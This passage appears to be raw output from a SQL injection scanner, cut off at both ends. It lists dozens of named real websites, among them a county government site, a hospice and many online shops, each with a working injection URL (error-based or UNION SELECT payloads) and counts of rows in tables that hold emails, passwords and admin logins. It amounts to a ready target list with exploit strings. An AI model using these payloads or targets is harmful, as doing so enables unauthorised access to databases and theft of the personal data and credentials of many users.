anntonys.orders_category\r\n\r\nborimpress.com\r\nURL:http://www.borimpress.com/event/2011/bookView.asp?bookid=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:123,470\r\n[60,268] borimpress.mailing_member\r\n[28,952] borimpress.t_user\r\n[9,580] borimpress.t_shop_order\r\n[6,920] borimpress.S_BBS_COMMON_1\r\n[4,487] borimpress.saveaddress\r\n[2,296] borimpress.t_bbs\r\n[2,220] borimpress.t_portfolio\r\n[1,724] borimpress.jrgSend\r\n[1,226] borimpress.crm\r\n[902] borimpress.S_BBS_COMMON_13\r\n[881] borimpress.S_BBS_COMMON_14\r\n[655] borimpress.t_request\r\n[496] borimpress.t_notice\r\n[493] borimpress.t_author\r\n[426] borimpress.S_BBS_COMMON_10\r\n[317] borimpress.mail_01\r\n[232] borimpress.S_BBS_COMMON_4\r\n[227] borimpress.studio2012\r\n[176] borimpress.t_reporter_info\r\n[126] borimpress.S_BBS_COMMON_8\r\n[119] borimpress.S_BBS_COMMON_12\r\n[114] borimpress.t_media_info\r\n[110] borimpress.S_BBS_COMMON_9\r\n[108] borimpress.S_BBS_COMMON_15\r\n[83] borimpress.t_misprint\r\n[66] borimpress.mail_picup1\r\n[63] borimpress.S_BBS_COMMON_3\r\n[53] borimpress.S_BBS_COMMON_11\r\n[30] borimpress.b_user\r\n[26] borimpress.S_BBS_COMMON_7\r\n[25] borimpress.BAS_news\r\n[25] borimpress.S_BBS_COMMON_6\r\n[24] borimpress.S_BBS_COMMON_5\r\n[9] borimpress.S_BBS_COMMON_2\r\n[3] borimpress.momsclass_mailing\r\n[3] borimpress.test\r\n[1] borimpress.BAS_User\r\n[1] borimpress.em_member\r\n[1] borimpress.p_admin\r\n[1] borimpress.t_event\r\n[1] borimpress.t_newpart_bbs\r\nTotal Rows:125,847\r\nSearch:admin\r\nRows:2,377\r\n[2,282] borimpress.shortcomment\r\n[60] borimpress.bookconsult\r\n[23] borimpress.member\r\n[10] borimpress.t_admin\r\n[1] borimpress.go_admin\r\n[1] borimpress.p_admin\r\nTotal Rows:142,812\r\nSearch:user\r\nRows:16,965\r\n[9,580] borimpress.t_shop_order\r\n[4,487] borimpress.saveaddress\r\n[1,378] borimpress.t_reply\r\n[951] borimpress.t_shop_product_cart\r\n[476] borimpress.t_newbook_member\r\n[53] borimpress.pic1\r\n[19] borimpress.oe_user\r\n[10] borimpress.myset_apply\r\n[8] borimpress.chekgrim_qna\r\n[1] borimpress.basAdmin\r\n[1] borimpress.BasReviews\r\n[1] borimpress.t_newpart\r\n\r\nthebasketballacademy.com\r\nURL:https://www.thebasketballacademy.com/about.asp?id=175&PID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:45,115\r\n[45,109] tnba_new.Campers\r\n[6] tnba_new.Clients\r\nTotal Rows:45,121\r\nSearch:password\r\nRows:6\r\n[6] tnba_new.Clients\r\nTotal Rows:45,256\r\nSearch:user\r\nRows:135\r\n[44] tnba_new.playerpictureslookup\r\n[41] tnba_new.player\r\n[40] tnba_new.playerpictures\r\n[6] tnba_new.playerposition\r\n[4] tnba_new.playerlevel\r\n\r\naudiovisualsecurity.org.uk\r\nURL:http://www.audiovisualsecurity.org.uk/product-details.asp?productID=71\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:password\r\nRows:4\r\n[1] cefdb.addvent_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.heatstore_login\r\nTotal Rows:11\r\nSearch:user\r\nRows:7\r\n[1] cefdb.addvent_login\r\n[1] cefdb.avs_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.emitex_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.ethos_login\r\n[1] cefdb.heatstore_login\r\n\r\nbrussellstribunal.org\r\nURL:http://www.brussellstribunal.org/article_view.asp?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32\r\nMethod:MySQL Union\r\nSearch:user\r\nRows:634\r\n[634] bt.bt_users\r\n\r\nco.manitowoc.wi.us\r\nURL:http://www.co.manitowoc.wi.us/department/services.asp?ID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:562\r\n[310] ManitowocCounty.StaffMember\r\n[122] ManitowocCounty.SignupPress\r\n[77] ManitowocCounty.Contact\r\n[28] ManitowocCounty.Director\r\n[25] ManitowocCounty.Supervisor\r\nTotal Rows:614\r\nSearch:admin\r\nRows:52\r\n[52] ManitowocCounty.Member\r\nTotal Rows:666\r\nSearch:password\r\nRows:52\r\n[52] ManitowocCounty.Member\r\nTotal Rows:799\r\nSearch:user\r\nRows:133\r\n[52] ManitowocCounty.Member\r\n[46] ManitowocCounty.SecurityRights\r\n[35] ManitowocCounty.BusSecurityRights\r\n\r\nboatplans.dk\r\nURL:http://www.boatplans.dk/boat_plans.asp?id=45999999.9\' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:17,164\r\n[7,971] boatplans.newsletter\r\n[6,536] boatplans.temptab\r\n[1,387] boatplans.kunder\r\n[453] boatplans.oldsub\r\n[313] boatplans.2co_kunder\r\n[228] boatplans.ppordre\r\n[192] boatplans.dlog\r\n[58] boatplans.2co_member\r\n[14] boatplans.temp_member\r\n[12] boatplans.mobi_kunder\r\n\r\nblackhatpersuasion.com\r\nURL:http://blackhatpersuasion.com/order.asp?id=111\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:29\r\n[29] instantcontent_blackhat.members\r\nTotal Rows:58\r\nSearch:password\r\nRows:29\r\n[29] instantcontent_blackhat.members\r\nTotal Rows:87\r\nSearch:user\r\nRows:29\r\n[29] instantcontent_blackhat.members\r\n\r\nalfenashoje.com.br\r\nURL:http://www.alfenashoje.com.br/resultado_promo.asp?id=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:119,197\r\n[83,400] alfenashoje.noticias_comentarios\r\n[26,450] alfenashoje.participantes\r\n[5,044] alfenashoje.newsletter\r\n[1,719] alfenashoje.mural\r\n[1,417] alfenashoje.assinantes\r\n[522] alfenashoje.obituarios_comentarios\r\n[385] alfenashoje.achadoseperdidos\r\n[199] alfenashoje.comercios\r\n[31] alfenashoje.albuns_comentarios\r\n[17] alfenashoje.boca\r\n[13] alfenashoje.funcionarios\r\n\r\ndev2.re-al.co.za\r\nURL:http://dev2.re-al.co.za/panga/asp/cart/addcart.asp?pid=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:7,021\r\n[2,966] Macbryan.User\r\n[2,431] Macbryan.data_markex\r\n[1,624] Macbryan.data_pastel\r\nTotal Rows:9,987\r\nSearch:password\r\nRows:2,966\r\n[2,966] Macbryan.User\r\nTotal Rows:14,732\r\nSearch:user\r\nRows:4,745\r\n[2,966] Macbryan.User\r\n[1,691] Macbryan.OrderHead\r\n[88] Macbryan.tbl_promo_response\r\n\r\ngtcp.org\r\nURL:http://www.gtcp.org/rainbowroom_detail.asp?ID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:133\r\n[131] db1056072_gtcp.Community_Rainbow_Rooms\r\n[2] db1056072_gtcp.Users_Old\r\nTotal Rows:196\r\nSearch:admin\r\nRows:63\r\n[37] db1056072_gtcp.DesktopModules\r\n[21] db1056072_gtcp.Tabs\r\n[4] db1056072_gtcp.Skins\r\n[1] db1056072_gtcp.Portals\r\nTotal Rows:200\r\nSearch:password\r\nRows:4\r\n[2] db1056072_gtcp.Users_Old\r\n[1] db1056072_gtcp.Portals\r\n[1] db1056072_gtcp.Users\r\nTotal Rows:211\r\nSearch:user\r\nRows:11\r\n[3] db1056072_gtcp.Links\r\n[2] db1056072_gtcp.UserRoles\r\n[2] db1056072_gtcp.Users_Old\r\n[1] db1056072_gtcp.Portals\r\n[1] db1056072_gtcp.Profile\r\n[1] db1056072_gtcp.SiteLog\r\n[1] db1056072_gtcp.UserPortals\r\n\r\nbalidyanavillas.com\r\nURL:http://www.balidyanavillas.com/news-promo.asp?id=999999.9 union all select 1,2,[t],4,5,6,7\r\nMethod:MySQL Union\r\nSearch:password\r\nRows:6\r\n[6] dyanavillas_com_db.tb_admin_login\r\nTotal Rows:12\r\nSearch:user\r\nRows:6\r\n[6] dyanavillas_com_db.tb_admin_login\r\n\r\nanglerworld.com\r\nURL:http://www.anglerworld.com/bassfish/bassboard/rods_reels/message.html?message_id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:1,834,425\r\n[1,496,951] NEWBOARD.comment_owner_info\r\n[336,354] NEWBOARD.message_owner_info\r\n[1,120] NEWBOARD.guides\r\nTotal Rows:1,835,545\r\nSearch:password\r\nRows:1,120\r\n[1,120] NEWBOARD.guides\r\nTotal Rows:3,670,038\r\nSearch:user\r\nRows:1,834,493\r\n[1,496,951] NEWBOARD.comment_owner_info\r\n[336,354] NEWBOARD.message_owner_info\r\n[1,120] NEWBOARD.guides\r\n[68] NEWBOARD.messageboard_information\r\n\r\nperfectorganics.com\r\nURL:http://www.perfectorganics.com/shop/products.asp?id=2&subcat=3&details=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:3,727\r\n[1,839] 33367_perfectorganicscom.customers\r\n[847] 33367_perfectorganicscom.MailingList\r\n[526] 33367_perfectorganicscom.MailingList_B\r\n[242] 33367_perfectorganicscom.holiday_2002\r\n[191] 33367_perfectorganicscom.holiday_2002_2nd\r\n[29] 33367_perfectorganicscom.mailtest3\r\n[24] 33367_perfectorganicscom.news\r\n[8] 33367_perfectorganicscom.T_COMMENTS\r\n[4] 33367_perfectorganicscom.mailtest2\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[4] 33367_perfectorganicscom.test_3\r\n[3] 33367_perfectorganicscom.listnames\r\n[2] 33367_perfectorganicscom.tracking_list\r\n[2] 33367_perfectorganicscom.TradeshowList\r\n[1] 33367_perfectorganicscom.contacts\r\n[1] 33367_perfectorganicscom.mailtest\r\nTotal Rows:4,168\r\nSearch:admin\r\nRows:441\r\n[242] 33367_perfectorganicscom.holiday_2002\r\n[191] 33367_perfectorganicscom.holiday_2002_2nd\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[4] 33367_perfectorganicscom.test_3\r\nTotal Rows:4,174\r\nSearch:password\r\nRows:6\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[2] 33367_perfectorganicscom.contact_admins\r\nTotal Rows:6,019\r\nSearch:user\r\nRows:1,845\r\n[1,839] 33367_perfectorganicscom.customers\r\n[4] 33367_perfectorganicscom.tblLogin\r\n[2] 33367_perfectorganicscom.contact_admins\r\n\r\nextranet.gsbfundraising.com\r\nURL:http://extranet.gsbfundraising.com/partnersandaffiliates.asp?ID=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:21\r\n[21] gsbdb.partnersaffiliates\r\nTotal Rows:22\r\nSearch:password\r\nRows:1\r\n[1] gsbdb.users\r\nTotal Rows:23\r\nSearch:user\r\nRows:1\r\n[1] gsbdb.users\r\n\r\nhamptonaffiliates.com\r\nURL:http://www.hamptonaffiliates.com/LocationDetails.asp?ID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:474\r\n[301] Internet.Users\r\n[134] Internet.TempUser\r\n[39] Internet.SalesPerson\r\nTotal Rows:2,067\r\nSearch:admin\r\nRows:1,593\r\n[1,593] Internet.Visitors\r\nTotal Rows:2,368\r\nSearch:password\r\nRows:301\r\n[301] Internet.Users\r\nTotal Rows:10,007\r\nSearch:user\r\nRows:7,639\r\n[5,063] Internet.UserCompanyAddress\r\n[1,593] Internet.Visitors\r\n[651] Internet.Spot_Log\r\n[301] Internet.Users\r\n[26] Internet.Spot_TraceGlobalData\r\n[4] Internet.UserType\r\n[1] Internet.Spot_TraceGlobalSummary\r\n\r\ntodaikorea.com\r\nURL:http://www.todaikorea.com/board/faq_list.asp?board_id=2\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:user\r\nRows:75,665\r\n[75,597] todai_old.todai_custom_t\r\n[68] todai_old.POPUP_TBL\r\n\r\nisgeng.co.za\r\nURL:http://www.isgeng.co.za/item_detail.asp?item_id=1567dada529d8cc96999999.9\' union all select [t],2,3,4,5,6 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:password\r\nRows:1\r\n[1] isgdb.UserTbl\r\nTotal Rows:2\r\nSearch:user\r\nRows:1\r\n[1] isgdb.UserTbl\r\n\r\nclublighthousepublishing.com\r\nURL:http://clublighthousepublishing.com/productpage.asp?bNumb=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:1,603\r\n[1,422] ReferenceNumbers.Orders\r\n[125] ReferenceNumbers.authors\r\n[31] ReferenceNumbers.iyzi_Members\r\n[25] ReferenceNumbers.Comments\r\nTotal Rows:1,634\r\nSearch:password\r\nRows:31\r\n[31] ReferenceNumbers.iyzi_Members\r\nTotal Rows:1,636\r\nSearch:user\r\nRows:2\r\n[2] ReferenceNumbers.Admin\r\n\r\ncart.shoppingtechnology.com\r\nURL:http://cart.shoppingtechnology.com/cart/affiliate-agreement.cfm?storeid=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:6,474\r\n[3,120] shoppingcart.accountinfo\r\n[2,298] shoppingcart.customers_copy\r\n[1,019] shoppingcart.getsite\r\n[26] shoppingcart.coupon\r\n[6] shoppingcart.renew\r\n[5] shoppingcart.approve\r\nTotal Rows:6,480\r\nSearch:admin\r\nRows:6\r\n[6] shoppingcart.urllinks\r\nTotal Rows:12,934\r\nSearch:password\r\nRows:6,454\r\n[3,120] shoppingcart.accountinfo\r\n[2,312] shoppingcart.customers\r\n[1,019] shoppingcart.getsite\r\n[3] shoppingcart.tools\r\nTotal Rows:16,055\r\nSearch:user\r\nRows:3,121\r\n[3,120] shoppingcart.accountinfo\r\n[1] shoppingcart.payflowpro\r\n\r\nnitroz.se\r\nURL:http://www.nitroz.se/motorny/shop/item_show.asp?code_no=amc7775\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:6\r\n[6] webshop_nitroz.supliers\r\nTotal Rows:8\r\nSearch:password\r\nRows:2\r\n[2] webshop_nitroz.users\r\n\r\ninternationalbeershop.com.au\r\nURL:http://www.internationalbeershop.com.au/products.asp?product_id=31 or 1=[t] and 1=1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:14,122\r\n[14,122] internationalbeershop_com_au.users\r\nTotal Rows:28,244\r\nSearch:admin\r\nRows:14,122\r\n[14,122] internationalbeershop_com_au.users\r\nTotal Rows:7,017,046\r\nSearch:user\r\nRows:6,988,802\r\n[5,386,822] internationalbeershop_com_au.user_product\r\n[1,320,364] internationalbeershop_com_au.user_newsletter\r\n[135,365] internationalbeershop_com_au.log\r\n[104,589] internationalbeershop_com_au.basket\r\n[19,604] internationalbeershop_com_au.orders\r\n[14,122] internationalbeershop_com_au.users\r\n[4,848] internationalbeershop_com_au.user_content\r\n[2,911] internationalbeershop_com_au.user_mail\r\n[177] internationalbeershop_com_au.user_login_log\r\n\r\ndarsharqiyat.com\r\nURL:http://darsharqiyat.com/book_details.asp?id=29\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:643\r\n[559] endapgg_glob.apg_orders\r\n[41] endapgg_glob.ll_Freelancers\r\n[18] endapgg_glob.ll_Clients\r\n[9] endapgg_glob.rag_customers\r\n[6] endapgg_glob.ftc_companies\r\n[4] endapgg_glob.ftc_labour\r\n[3] endapgg_glob.Tcl_Mailinglist\r\n[2] endapgg_glob.Tcl_Mailinglist0\r\n[1] endapgg_glob.apg_tickets\r\nTotal Rows:3,441\r\nSearch:password\r\nRows:2,798\r\n[1,455] endapgg_glob.manara_students\r\n[1,305] endapgg_glob.manara_students0\r\n[9] endapgg_glob.rag_customers\r\n[8] endapgg_glob.ll_user_login\r\n[7] endapgg_glob.ll_admin_login\r\n[6] endapgg_glob.ftc_companies\r\n[1] endapgg_glob.abnya_admin_login\r\n[1] endapgg_glob.apg_admin_login\r\n[1] endapgg_glob.ftc_admin_login\r\n[1] endapgg_glob.manara_admin_login\r\n[1] endapgg_glob.rag_admin_login\r\n[1] endapgg_glob.rag_users\r\n[1] endapgg_glob.sharq_admin_login\r\n[1] endapgg_glob.Tcl_Users\r\nTotal Rows:6,273\r\nSearch:user\r\nRows:2,832\r\n[1,455] endapgg_glob.manara_students\r\n[1,305] endapgg_glob.manara_students0\r\n[34] endapgg_glob.apg_itemsordered\r\n[9] endapgg_glob.rag_customers\r\n[8] endapgg_glob.ll_user_login\r\n[7] endapgg_glob.ll_admin_login\r\n[6] endapgg_glob.ftc_companies\r\n[1] endapgg_glob.abnya_admin_login\r\n[1] endapgg_glob.apg_admin_login\r\n[1] endapgg_glob.ftc_admin_login\r\n[1] endapgg_glob.manara_admin_login\r\n[1] endapgg_glob.rag_admin_login\r\n[1] endapgg_glob.rag_users\r\n[1] endapgg_glob.sharq_admin_login\r\n[1] endapgg_glob.Tcl_Users\r\n\r\nflaskstore.com\r\nURL:http://www.flaskstore.com/detail.asp?productId=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10,11\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:357\r\n[357] jhendley.users\r\nTotal Rows:362\r\nSearch:password\r\nRows:5\r\n[5] jhendley.tblSecure\r\nTotal Rows:367\r\nSearch:user\r\nRows:5\r\n[5] jhendley.tblSecure\r\n\r\ninfostaff.com.br\r\nURL:http://www.infostaff.com.br/add_cart.asp?id_produto=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:1,383,818\r\n[1,133,451] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS_Comprada\r\n[221,292] n0u_infostaff_com_br.Tabela_Vendas\r\n[19,769] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS\r\n[3,721] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS1\r\n[1,679] n0u_infostaff_com_br.TABELA_MARKETING\r\n[1,536] n0u_infostaff_com_br.Lista_Daniel_Groupon\r\n[1,406] n0u_infostaff_com_br.NEWSLETTER_E-STAFF\r\n[483] n0u_infostaff_com_br.tbClientes\r\n[434] n0u_infostaff_com_br.Lojas\r\n[27] n0u_infostaff_com_br.tbCampanha_Marketing\r\n[10] n0u_infostaff_com_br.tbParceiros\r\n[6] n0u_infostaff_com_br.Afeta\r\n[4] n0u_infostaff_com_br.TABELA_EMAILS_COLETADOS2\r\nTotal Rows:1,383,820\r\nSearch:admin\r\nRows:2\r\n[1] n0u_infostaff_com_br.tbl_general\r\n[1] n0u_infostaff_com_br.tbl_general.BAK\r\nTotal Rows:1,383,849\r\nSearch:user\r\nRows:29\r\n[14] n0u_infostaff_com_br.tbl_client\r\n[13] n0u_infostaff_com_br.tbl_client.BAK\r\n[2] n0u_infostaff_com_br.tbl_login\r\n\r\ncarolinaretail.com\r\nURL:http://www.carolinaretail.com/category.asp?Cat=Christian Gift Wrap and Bags\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:441,199\r\n[410,745] CRP_Production.OrderHeaderImport\r\n[28,146] CRP_Production.Customers\r\n[1,904] CRP_Production.OrderHeader\r\n[402] CRP_Production.HistoryOrderHeaders\r\n[2] CRP_Production.Reps\r\nTotal Rows:469,353\r\nSearch:password\r\nRows:28,154\r\n[28,146] CRP_Production.Customers\r\n[6] CRP_Production.Users\r\n[2] CRP_Production.Reps\r\nTotal Rows:497,909\r\nSearch:user\r\nRows:28,556\r\n[28,146] CRP_Production.Customers\r\n[402] CRP_Production.HistoryOrderHeaders\r\n[6] CRP_Production.Users\r\n[2] CRP_Production.Reps\r\n\r\nchockstone.org\r\nURL:http://www.chockstone.org/Media/Review.asp?Action=Show&BookID=[t]&LimitFormat=M...\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:19,798\r\n[10,182] Chockstone.RHOrder\r\n[6,768] Chockstone.ForumUser\r\n[2,524] Chockstone.ForumUserPending\r\n[324] Chockstone.CruxClient\r\nTotal Rows:29,414\r\nSearch:password\r\nRows:9,616\r\n[6,768] Chockstone.ForumUser\r\n[2,524] Chockstone.ForumUserPending\r\n[324] Chockstone.CruxClient\r\nTotal Rows:329,247\r\nSearch:user\r\nRows:299,833\r\n[221,636] Chockstone.ForumMessage\r\n[39,764] Chockstone.ForumUserPrivateMessage\r\n[10,182] Chockstone.RHOrder\r\n[9,875] Chockstone.ForumPollVote\r\n[6,768] Chockstone.ForumUser\r\n[2,524] Chockstone.ForumUserPending\r\n[2,124] Chockstone.PictureComment\r\n[1,842] Chockstone.ForumSubjectUserConfig\r\n[1,363] Chockstone.ForumUserInteraction\r\n[1,180] Chockstone.ForumUserMessage\r\n[548] Chockstone.BookReview\r\n[375] Chockstone.Book\r\n[364] Chockstone.Link\r\n[344] Chockstone.BookURL\r\n[268] Chockstone.Picture\r\n[215] Chockstone.Event\r\n[206] Chockstone.Rebolt\r\n[172] Chockstone.ReboltQld\r\n[60] Chockstone.ReboltWA\r\n[23] Chockstone.EventAttendee\r\n\r\npeacehospicecare.org.uk\r\nURL:http://www.peacehospicecare.org.uk/viewevent.asp?eventID=499\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,739\r\n[3,370] peacehospicenew.tblorders\r\n[1,005] peacehospicenew.form_teamemail\r\n[446] peacehospicenew.news\r\n[423] peacehospicenew.event\r\n[198] peacehospicenew.vsp\r\n[104] peacehospicenew.job\r\n[80] peacehospicenew.lol_ceremony\r\n[71] peacehospicenew.ecard_creates\r\n[34] peacehospicenew.shopvsp\r\n[7] peacehospicenew.ecard_registrations\r\n[1] peacehospicenew.lol_settings\r\nTotal Rows:5,767\r\nSearch:password\r\nRows:28\r\n[21] peacehospicenew.security\r\n[7] peacehospicenew.ecard_registrations\r\nTotal Rows:8,125\r\nSearch:user\r\nRows:2,358\r\n[2,337] peacehospicenew.logged\r\n[21] peacehospicenew.security\r\n\r\nrainbowtekstil.no\r\nURL:http://www.rainbowtekstil.no/ehandel/product.asp?intProdID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:9,803\r\n[4,672] db1010363_RainbowTekstil.Bruker\r\n[2,919] db1010363_RainbowTekstil.USERS\r\n[1,800] db1010363_RainbowTekstil.Newsletter\r\n[395] db1010363_RainbowTekstil.MobilUsers\r\n[17] db1010363_RainbowTekstil.article\r\nTotal Rows:12,724\r\nSearch:password\r\nRows:2,921\r\n[2,919] db1010363_RainbowTekstil.USERS\r\n[1] db1010363_RainbowTekstil.config\r\n[1] db1010363_RainbowTekstil.Info\r\nTotal Rows:12,741\r\nSearch:user\r\nRows:17\r\n[17] db1010363_RainbowTekstil.article\r\n\r\necproducts.co.uk\r\nURL:http://www.ecproducts.co.uk/category.asp?item=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:1,994\r\n[1,397] ecproductsdb.Orders\r\n[597] ecproductsdb.CatalogueRequests\r\nTotal Rows:1,996\r\nSearch:admin\r\nRows:2\r\n[2] ecproductsdb.AdminUser\r\nTotal Rows:1,998\r\nSearch:password\r\nRows:2\r\n[2] ecproductsdb.AdminUser\r\nTotal Rows:2,000\r\nSearch:user\r\nRows:2\r\n[2] ecproductsdb.AdminUser\r\n\r\nonestopfaqs.com\r\nURL:http://www.onestopfaqs.com/type.asp?iType=999999.9 union all select 1,[t],3,4,5,6\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:50,999\r\n[25,586] dbonestopfaqs.tblanswers\r\n[24,905] dbonestopfaqs.tblquestions\r\n[508] dbonestopfaqs.tblalerts\r\nTotal Rows:51,000\r\nSearch:admin\r\nRows:1\r\n[1] dbonestopfaqs.tbladmin\r\nTotal Rows:51,001\r\nSearch:password\r\nRows:1\r\n[1] dbonestopfaqs.tbladmin\r\nTotal Rows:51,002\r\nSearch:user\r\nRows:1\r\n[1] dbonestopfaqs.tbladmin\r\n\r\nwlace.com\r\nURL:http://www.wlace.com/insight/registry/classlist.asp?catID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:37,461\r\n[28,075] whitelake.Profile\r\n[7,306] whitelake.Class\r\n[1,121] whitelake.profileExt_activities\r\n[604] whitelake.Instructor\r\n[353] whitelake.DistrictClientRep\r\n[1] whitelake.Client\r\n[1] whitelake.Contact\r\nTotal Rows:65,613\r\nSearch:password\r\nRows:28,152\r\n[28,075] whitelake.Profile\r\n[77] whitelake.Users\r\nTotal Rows:803,220\r\nSearch:user\r\nRows:737,607\r\n[187,018] whitelake.StatementDetail\r\n[139,836] whitelake.ReservationAgeGrp\r\n[71,115] whitelake.ReservationSpaceXref\r\n[55,763] whitelake.Registration\r\n[50,751] whitelake.Attendance\r\n[39,173] whitelake.ReservationFacilityXref\r\n[37,407] whitelake.ReservationDate\r\n[37,215] whitelake.Reservation\r\n[28,075] whitelake.Profile\r\n[26,670] whitelake.ActionLog\r\n[19,640] whitelake.ProfileFamily\r\n[7,306] whitelake.Class\r\n[6,969] whitelake.Course\r\n[5,793] whitelake.Statement\r\n[5,316] whitelake.ReservationConflictHolding\r\n[4,439] whitelake.ClassSpaceXref\r\n[4,192] whitelake.ClassFeeXref\r\n[1,554] whitelake.Fee\r\n[1,160] whitelake.ReservationSpaceXref_old\r\n[1,121] whitelake.profileExt_activities\r\n[1,121] whitelake.profileExt_medical\r\n[1,013] whitelake.ClassProgramRateXref\r\n[904] whitelake.Category\r\n[668] whitelake.Space\r\n[604] whitelake.Instructor\r\n[578] whitelake.SpaceFeeTypeXref\r\n[360] whitelake.BatchQueue\r\n[353] whitelake.DistrictClientRep\r\n[316] whitelake.ReservationFacilityXref_old\r\n[264] whitelake.Facility\r\n[191] whitelake.DistrictClient\r\n[183] whitelake.Payment\r\n[132] whitelake.ReservationFeeTypeXref\r\n[131] whitelake.AcctCode\r\n[56] whitelake.Form\r\n[49] whitelake.ReservationSchoolXref\r\n[46] whitelake.ProgramRate\r\n[19] whitelake.EquipmentItemFeeTypeXref\r\n[19] whitelake.EquipmentItems\r\n[18] whitelake.ServiceCat\r\n[17] whitelake.ProfileImmunization\r\n[10] whitelake.ReservationEquipmentXref\r\n[7] whitelake.AttendanceFeeXref\r\n[7] whitelake.AvailabilitySched\r\n[7] whitelake.FormProductXref\r\n[6] whitelake.Product\r\n[4] whitelake.ClientMsg\r\n[4] whitelake.ProductCategory\r\n[3] whitelake.ReservationEquipmentXref_old\r\n[1] whitelake.AwardViolation\r\n[1] whitelake.Client\r\n[1] whitelake.Contact\r\n[1] whitelake.Department\r\n\r\nhotshoppe.com\r\nURL:http://www.hotshoppe.com/productPage.asp?PID=617\' and [t] and \'1\'=\'1&CategoryID=10&CategoryName=BARBEQUE SAUCES & RUBS\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:14,170\r\n[6,342] movementdhwin_hs.emaillist\r\n[6,027] movementdhwin_hs.temailstats\r\n[1,794] movementdhwin_hs.emailtemp\r\n[2] movementdhwin_hs.tcontentcomments\r\n[2] movementdhwin_hs.tusers\r\n[1] movementdhwin_hs.admin\r\n[1] movementdhwin_hs.temailreturnstats\r\n[1] movementdhwin_hs.tsettings\r\nTotal Rows:14,172\r\nSearch:admin\r\nRows:2\r\n[2] movementdhwin_hs.tusers\r\nTotal Rows:14,178\r\nSearch:password\r\nRows:6\r\n[4] movementdhwin_hs.security\r\n[2] movementdhwin_hs.tusers\r\nTotal Rows:14,191\r\nSearch:user\r\nRows:13\r\n[4] movementdhwin_hs.security\r\n[3] movementdhwin_hs.tsessiontracking\r\n[2] movementdhwin_hs.tcontentcomments\r\n[2] movementdhwin_hs.tusers\r\n[2] movementdhwin_hs.tuserstrikes\r\n\r\nhornbyguide.com\r\nURL:http://www.hornbyguide.com/service_sheet_details.asp?sheetid=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:435\r\n[435] hornbydata.Donate\r\n\r\nbetaco.com\r\nURL:http://www.betaco.com/cmag_product_details.asp?productid=M7FAL21\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:7,475\r\n[6,844] betaco.customers\r\n[630] betaco.tblDistributors\r\n[1] betaco.master\r\nTotal Rows:7,489\r\nSearch:user\r\nRows:14\r\n[8] betaco.tblPageList_Users\r\n[5] betaco.tblUsers\r\n[1] betaco.tblMerge\r\n\r\nmundukmodingplantation.com\r\nURL:http://www.mundukmodingplantation.com/view_detail_room.asp?id=46540848494F4B7B8936B26C3567E09E\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:12,846\r\n[12,805] hordb_baskom1.RESERVATION\r\n[41] hordb_baskom1.COMPANY\r\nTotal Rows:12,847\r\nSearch:admin\r\nRows:1\r\n[1] hordb_baskom1.WEB_USERS\r\n\r\nfeaturewallpaper.com\r\nURL:http://www.featurewallpaper.com/product-details.asp?ID=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:1,349\r\n[1,224] holdendecor1.tblSampleRequests\r\n[56] holdendecor1.tbl_rlr_user_deleted\r\n[44] holdendecor1.tblDistributor\r\n[22] holdendecor1.tblHoldenOrders\r\n[2] holdendecor1.tblSubscriptionsFWP\r\n[1] holdendecor1.tblTradeCustomersx\r\nTotal Rows:1,839\r\nSearch:password\r\nRows:490\r\n[430] holdendecor1.tblTradeCustomers\r\n[56] 